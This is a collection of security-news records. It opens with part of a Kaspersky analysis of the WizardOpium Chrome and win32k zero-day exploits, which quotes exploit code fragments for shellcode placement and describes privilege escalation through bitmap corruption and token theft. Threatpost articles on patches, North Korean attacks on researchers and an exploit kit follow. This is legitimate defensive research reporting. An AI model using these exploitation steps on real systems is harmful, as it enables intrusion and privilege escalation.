This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of a bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of the tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) where pre-initialized extra data can lead to system procedures handling it incorrectly. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc_ and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. 
To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating an Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares a Switch Window and uses the vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as the Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). 
The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses the executable in search of the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post-exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. 
The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-01-13T05:41:44", "bulletinFamily": "info", "cvelist": ["CVE-2020-1643", "CVE-2020-1668", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1673", "CVE-2021-1705"], "description": "Microsoft addressed 10 critical bugs, one under active exploit and another publicly known, in its [January Patch Tuesday roundup of fixes](<https://msrc.microsoft.com/update-guide>). In total it patched 83 vulnerabilities.\n\nThe most serious bug is a flaw in Microsoft\u2019s Defender anti-malware software that allows remote attackers to infect targeted systems with executable code. Security experts are warning that Windows users who have not connected to the internet recently and received an auto-update should patch now.\n\n\u201cThis bug in the Microsoft Malware Protection Engine may already be patched on your system as the engine auto-updates as needed. However, if your systems are not connected to the internet, you\u2019ll need to manually apply the patch,\u201d wrote Dustin Childs, Trend Micro\u2019s Zero Day Initiative (ZDI) security manager.\n\nResearchers believe the vulnerability, [tracked as CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), has been exploited for the past three months and was leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>). 
Last month, Microsoft said state-sponsored hackers had compromised its internal network and leveraged additional Microsoft products to conduct further attacks.\n\nAffected versions of Microsoft Malware Protection Engine range from 1.1.17600.5 to 1.1.17700.4 running on Windows 10, Windows 7 and Windows Server 2004, [according to](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) the security bulletin.\n\n## **Publicly Known Bug Fixed Twice**\n\nMicrosoft patched a second vulnerability that researchers believe was also being exploited in the wild, tracked as [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>). The flaw is classified as an elevation-of-privilege bug and impacts the Windows [print driver process SPLWOW64.exe](<https://goliathtechnologies.com/troubleshoot-resolve-citrix-splwow64-exe-issues-p>).\n\nThe bug was first discovered by Google and patched. But ZDI believes that patch was insufficient and opened the door to further attacks. Childs said that ZDI re-discovered the flaw a second time, which Microsoft patched again Tuesday.\n\n\u201cThe previous patch introduced a function to check an input string pointer, but in doing so, it introduced an Out-of-Bounds (OOB) Read condition. Additional bugs are also covered by this patch, including an untrusted pointer deref,\u201d Childs wrote in a prepared [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/1/12/the-january-2021-security-update-review>).\n\n## **Additional Critical Bugs**\n\nEight additional bugs rated critical were also part of Microsoft\u2019s Tuesday vulnerability fixes.\n\nThese included a remote code-execution bug in Microsoft\u2019s Edge web browser. 
The vulnerability (CVE-2021-1705) is memory-related and tied to the way the browser improperly accesses objects in memory.\n\n\u201cSuccessful exploitation of the vulnerability could enable an attacker to gain the same privileges as the current user,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in prepared analysis. \u201cIf the current user is logged on with admin rights, an attacker could take control of an affected system. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights. An attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge, and then convince a user to view the website.\u201d\n\nAdditional critical bugs were tied to Windows Graphics Device Interface (CVE-2021-1665), HEVC Video Extensions (CVE-2020-1643), and the Microsoft DTV-DVD Video Decoder (CVE-2020-1668).\n\nFive January Patch Tuesday flaws (CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667 and CVE-2021-1673) were each remote procedure call bugs. As the name suggests, the vulnerability exists in the Windows Remote Procedure Call authentication process. If exploited, an attacker could gain elevation of privileges, run a specially crafted application and take complete control of the targeted system.\n\n\u201cWith the SolarWinds breach still fresh from December and the scope of impact growing by the day, there\u2019s a reaffirmed urgency for organizations to implement best practices for even the most basic security habits,\u201d Knapp wrote. \u201cWhether it\u2019s patching zero-day vulnerabilities within a 24-hour window or implementing strong password protocols, the need for security diligence has never been more evident.\u201d\n", "modified": "2021-01-12T21:45:23", "published": "2021-01-12T21:45:23", "id": "THREATPOST:B879E243998561911585BBD37B7F33E9", "href": "https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/", "type": "threatpost", "title": "Critical Microsoft Defender Bug Actively Exploited; Patch Tuesday Offers 83 Fixes", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-26T16:35:34", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "Hackers linked to [North Korea](<https://threatpost.com/north-korea-spy-reporters-feds-warn/160622/>) are targeting security researchers with an elaborate social-engineering campaign that sets up trusted relationships with them \u2014 and then infects their organizations\u2019 systems with custom backdoor malware.\n\nThat\u2019s according to [Google\u2019s Threat Analysis Group (TAG),](<https://twitter.com/ShaneHuntley/status/1353856344655204352>) which issued a warning late Monday about a campaign it has tracked over the last several months that uses various means to interact with and attack professionals working on 
vulnerability research and development at multiple organizations.\n\nThe effort includes attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves, according to a [blog post](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) by TAG\u2019s Adam Weidermann. Hackers first establish communications with researchers in a way that looks like they are credibly working on similar projects, then they ask them to collaborate, and eventually infect victims\u2019 machines.\n\nThe infections are propagated either through a malicious backdoor in a Visual Studio Project or via an infected website, he wrote. Moreover, those infected were running fully patched and up-to-date Windows 10 and Chrome browser versions \u2014 a signal that hackers likely are using zero-day vulnerabilities in the campaign, the researcher concluded.\n\nTAG attributed the threat actors to \u201ca government-backed entity based in North Korea.\u201d\n\n\u201cThey\u2019ve used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits, and for amplifying and retweeting posts from other accounts that they control,\u201d according to the post. \u201cTheir blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u2018guest\u2019 posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.\u201d\n\nIn addition to Twitter, threat actors also used other platforms, including LinkedIn, Telegram, [Discord](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>), Keybase and email to communicate with potential targets, Weidermann said. 
So far it seems that only security researchers working on Windows machines have been targeted.\n\n## **Making Connections**\n\nAttackers initiate contact by asking a researcher if he or she wants to collaborate on vulnerability research together. Threat actors appear to be credible researchers in their own right because they have already posted videos of exploits they\u2019ve worked on, including faking the success of a working exploit for an existing and recently patched [Windows Defender vulnerability](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>), [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>), on YouTube.\n\nThe vulnerability received notoriety as one that has been exploited for the past three months and leveraged by hackers as part of the massive [SolarWinds attack](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>).\n\n\u201cIn the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake,\u201d Weidermann explained.\n\nIf an unsuspecting targeted researcher agrees to collaborate, attackers then provide the researcher with a Visual Studio Project infected with malicious code. Several targets [took to Twitter](<https://twitter.com/search?q=blog.br0vvnn.io&src=typed_query>) to describe their experiences.\n\n> I got targeted by Zhang Guo and sent me the blog post link hxxps://blog.br0vvnn[.]io/pages/blogpost.aspx?id=1&q=1 <https://t.co/QR5rUYDHrh>\n> \n> \u2014 lockedbyte (@lockedbyte) [January 26, 2021](<https://twitter.com/lockedbyte/status/1353995532180615174?ref_src=twsrc%5Etfw>)\n\n\u201cWithin the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events,\u201d Weidermann wrote. 
\u201cThe DLL is custom malware that would immediately begin communicating with actor-controlled command-and-control (C2) domains.\u201d\n\nVictims also can be infected by following a Twitter link hosted on blog.br0vvnn[.]io to visit a threat actor\u2019s blog, according to TAG. Accessing the link installs a malicious service on the researcher\u2019s system that executes an in-memory backdoor that establishes a connection to an actor-owned C2 server, researchers discovered.\n\nThe TAG team so far could not confirm the mechanism of compromise, asking for help from the greater security community to identify and submit information through the [Chrome Vulnerability Reward Program](<https://www.google.com/about/appsecurity/chrome-rewards/>).\n\nResearchers also did not specifically say what the likely motive was for the attacks; however, presumably the threat actors aim to uncover and steal vulnerabilities to use in North Korean advanced persistent threat (APT) campaigns.\n\nWeidermann\u2019s post includes a list of known accounts being used in the campaign, and he advised researchers who may have communicated with any of the accounts or visited related sites to review their systems for compromise.\n\n\u201cWe hope this post will remind those in the security research community that they are targets to government-backed attackers and should remain vigilant when engaging with individuals they have not previously interacted with,\u201d Weidermann wrote.\n", "modified": "2021-01-26T14:49:03", "published": "2021-01-26T14:49:03", "id": "THREATPOST:FF67AF009F2F0031599099334F6CC306", "href": "https://threatpost.com/north-korea-security-researchers-0-day/163333/", "type": "threatpost", "title": "North Korea Targets Security Researchers in Elaborate 0-Day Campaign", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1491"], "description": "UPDATE\n\nMicrosoft has added a fresh CVE to its security portal, linking it to the existing November security updates (the patch itself was already included in the updates, but not specifically named). The CVE describes a vulnerability in SharePoint Server.\n\nAccording to a Microsoft Security Advisory, an attacker could exploit the bug (CVE-2019-1491) to obtain sensitive information and then use that information to mount further attacks.\n\n\u201cAn information disclosure vulnerability exists in SharePoint Server. An attacker who exploited this vulnerability could read arbitrary files on the server,\u201d according to [the advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1491>), published on Tuesday. \u201cTo exploit the vulnerability, an attacker would need to send a specially crafted request to a susceptible SharePoint Server instance.\u201d\n\nThe reading pane is not an attack vector, the computing giant added.\n\nThe patch addresses the important-severity vulnerability by changing how affected APIs process requests. 
Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 SP2 and 2013 SP1 and Microsoft SharePoint Server 2019 are impacted; Saif ElSherei of Microsoft Research Center\u2019s Vulnerabilities and Mitigations Team is credited with discovering the bug.\n\nThe CVE has been added to the computing giant\u2019s existing stash of Patch Tuesday security updates.\n\n[December\u2019s Patch Tuesday](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) was relatively light, and it delivered just 37 CVEs (including the new one) across a range of products. The scheduled security update this month in all now includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business; it addressed seven bugs that are rated critical, 29 that are rated important (including the new bug), and one rated moderate in severity.\n\nOne of the updates is a fix for a bug that was first seen being exploited in the wild as a zero-day. [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k; the exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n**_This post was updated at 10:50 a.m. ET on Dec. 19 to correct the statement that this was an \u201cout-of-band\u201d security patch. CISA/US-CERT mistakenly issued an alert using that language, leading to confusion on the part of this reporter and many others. We apologize for the error. 
_**\n", "modified": "2019-12-18T19:14:55", "published": "2019-12-18T19:14:55", "id": "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "href": "https://threatpost.com/microsoft-issues-out-of-band-update-sharepoint-bug/151260/", "type": "threatpost", "title": "Microsoft Issues Out-of-Band Update for SharePoint Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for the community to come together and share insights and research in the meantime.\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. 
ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but has evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. 
Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. 
Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. 
Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. The flaw was later [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>) as part of the February 2020 Patch Tuesday release. 
